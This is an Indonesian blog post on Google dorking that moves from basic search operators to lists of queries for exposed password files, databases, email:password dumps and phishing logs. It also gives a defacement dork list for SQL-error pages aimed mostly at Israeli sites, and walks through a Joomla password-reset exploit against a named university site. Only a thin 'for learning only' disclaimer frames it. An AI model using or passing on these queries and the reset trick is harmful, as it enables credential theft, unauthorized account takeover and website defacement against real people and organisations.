Cara Ampuh Membuat Google Dork!!

Google dork adalah mesin untuk mencari / search engine sehingga dapat memudahkan Google untuk mencari alamat (url), password, dll yang ter-index oleh search engine google. Namun hal ini kenyataannya Google dork digunakan 80% untuk hal yang negatif seperti deface website/situs, mencari password, carding, dan lainnya. Google biasa digunakan untuk hal-hal negatif oleh hacker.

Jadi saran saya ini djangan di jadikan hal negatif ya kalau bisa ini hanya untuk pembelajaran saja karna sekarang sudah ada undang undang ITE kalok dilakukan untuk hacking maka akan tercyduk kalau belum punya skill yang lumayan.
Cara Ampuh Membuat Google Dork!!

Pengenalan tentang google dork:
Tipe-tipe dalam penggunaannya ada beberapa di antaranya sebagai berikut:
  • intitle
    allintitle
    Fungsinya adalah untuk mencari judul/title pada suatu website.
  • inurl
    allinurl
    Fungsinya adalah untuk mencari suatu string yang terdapat pada url.
  • filetype
    Fungsinya adalah untuk mencari suatu file secara lebih spesifik.
  • allintext
    Fungsinya adalah untuk mencari suatu nilai string dalam suatu website.
  • site
    Fungsinya adalah untuk mencari pada website tertentu.
  • link
    Fungsinya adalah untuk mencari website website yang mempunyai link pada website yang dipilih.
Contoh dalam penggunaannya:
  1. Apabila kita ingin mencari sebuah lagu dari taylor swift maka kita ketikan sja di google seperti ini
    intitle:"index of/taylor swift"dan apa hasilnya, akan kelihatan semua kumpulan lagu-lagu tersebut, dan dengan mudah untuk kita mendownloadnya.
    Pengertian diatas, mksdnya biasanya dalam sebuah databse file web terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk mencari sebuah title yang berkaitan dengan kata ( index of ), kalian ketikan kata taylor swift agar google mencari database file tentg kata-kata taylor swift.
  2. Apabila kita ingin mencari sebuah skripsi maka kita ketikan sja di google seperti ini
    intitle:"index of" "skripsi" site:.ac.id
    mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id
Dan ini contoh2 lain dalam penggunaan google dork:
  • inurl:"guest | book" "html allowed"
  • inurl:password.log
  • intitle:"index of" password.txt site:my
  • intitle:"index of" admin.mdb
  • intitle:"index of" member.mdb
  • intitle:"phpmyadmin" "running on localhost"
  • intitle:"index of" "data base" site:id
  • inurl:database.inc site:id
  • inurl:connector.txt site:id
  • site:id filetype:.doc

  • inurl:”spaw2/uploads/files/”
  • inurl:/editor/editor/filemanager/
  • inurl:/HTMLEditor/editor/"
  • index.php?id=
  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=
  • home.php?seite=
Sehingga kita bisa menggunakan google dork ini untuk senjata hacking kita.
Misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan menggunakan token (').
biasanya url ketika memasukan token tersebut adalah:
  • *******.com/index.php?option=com_user&view=reset&layout=confirm
    di url tsb terdapat tulsan option=com_user
    mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user
  • ketikan di google >>>>> inurl:"option=com_user"dan akan terlihat hasilnya, kita ambil contoh pada web indonesia saja,
    http://www.lbifib.ui.ac.id/index.php...ser&view=login
    lalu hapus pada url (/index.php?option=com_user&view=login) dan ganti url tersebut menjadi
    http://www.lbifib.ui.ac.id/index.php...layout=confirm
  • lalu ketikan token '
    dan apa hasilnya, password sudah bisa kita reset ulang,,,,
    sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.
Dork Email
  • filetype:txt @yahoo.com password:*
  • filetype:txt @ymail.com password:***
  • filetype:txt @yahoo.com password:***
  • filetype:txt @gmail.com password:*
  • filetype:txt @gmail.com password:*
  • filetype:txt email + password:* @gmail.com @yahoo.com


Dork Rapidshare
Expiration-date:*2018 +login: rapidshare.com

Note : Date nya tinggal ganti sesuka kita, mau di ubah ke 2011- 2012- 2013. Etc


Dork Fake Login
  • Untuk mencari email beserta password hasil phishing bisa juga menggunakan google dork
    search aja di google dengan dork ini
    DORK ->
    intext:"Date Submitted" intext:"password" intext:"email" inurl:"logs.txt"

Dork Untuk Defacing (The Best Dork)
Sebagian Dork untuk Aksi Deface

  • inurl:"id=" & intext:"Warning: preg_match() " site:.il
  • inurl:"id=" & intext:"Warning: ilesize() " site:.co.il
  • inurl:"id=" & intext:"Warning: filesize() " site:.co.il
  • inurl:"id=" & intext:"Warning: require() " site:.co.il
  • inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
  • inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
  • inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
  • inurl:"id=" & intext:"Warning: mysql_fetch_array() " site:.au
  • inurl:"id=" & intext:"Warning: mysql_num_rows() " site:.co.il
  • inurl:"id=" & intext:"Warning: session_start() " site:.il
  • inurl:"id=" & intext:"Warning: getimagesize() " site:.co.il
  • inurl:"id=" & intext:"Warning: is_writable() " site:.ca
  • inurl:"id=" & intext:"Warning: getimagesize() " site:.co.il
  • inurl:"id=" & intext:"Warning: Unknown() " site:.il
  • inurl:"id=" & intext:"Warning: session_start() " site:.il
  • inurl:"id=" & intext:"Warning: mysql_result() " site:.il
  • inurl:"id=" & intext:"Warning: pg_exec() " site:.il
  • inurl:"id=" & intext:"Warning: mysql_result() " site:.il
  • inurl:"id=" & intext:"Warning: mysql_num_rows() " site:.il
  • inurl:"id=" & intext:"Warning: mysql_query() " site:.il
  • inurl:"id=" & intext:"Warning: array_merge() " site:.co.il

Sekarang tinggal copy salah satu Dork diatas, di Google dan lihat hasilnya.

Sekian dari artikel ini semoga bermanfaat bagi kalian semua "Ingat ini hanya pembalajaran/materi jangan dijadikan untuk tindakan cyber dan saya tidak tanggung jawab atas semuanya" Jangan lupa untuk comment dan share artikel ini ke akun media social anda, Terimakasih telah membaca artikel ini sampai jumpa di artikel selanjutnya.


Berkomentarlah Dengan Baik!

Emoticon